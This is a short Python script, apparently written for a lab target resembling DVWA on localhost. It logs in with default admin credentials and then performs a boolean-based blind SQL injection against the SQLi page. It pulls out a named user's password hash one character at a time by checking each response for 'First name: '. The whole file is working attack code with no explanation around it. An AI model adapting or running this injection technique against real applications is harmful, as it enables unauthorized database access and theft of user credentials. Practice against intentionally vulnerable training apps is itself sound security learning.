hack2.py

import urllib
import string
import re
import sys

import requests

base_url = "http://localhost:1337"
session = requests.Session()


def login():
    r = session.get(base_url + '/login.php')
    token = re.search(r"name=\'user_token\' value=\'([a-z0-9]+)", r.text).group(1)

    session.post(base_url + '/login.php', data={
        'username': 'admin',
        'password': 'password',
        'Login': 'Login',
        'user_token': token
    })


def attempt(username, text):
    payload = "-1'<@=1 OR (select user from users where password like '" + text + "%' limit 1)='" + username
    url = base_url + "/vulnerabilities/sqli/?Submit=Submit&" + urllib.parse.urlencode({
        "id": payload
    })

    r = session.get(url)
    return b'First name: ' in r.content


def leak_password(username):
    password = ""
    for offset in range(32):
        for letter in string.ascii_lowercase + string.digits:
            if attempt(username, password + letter):
                password += letter
                break

    return password


if __name__ == '__main__':
    login()
    print(sys.argv[1] + ':' + leak_password(sys.argv[1]))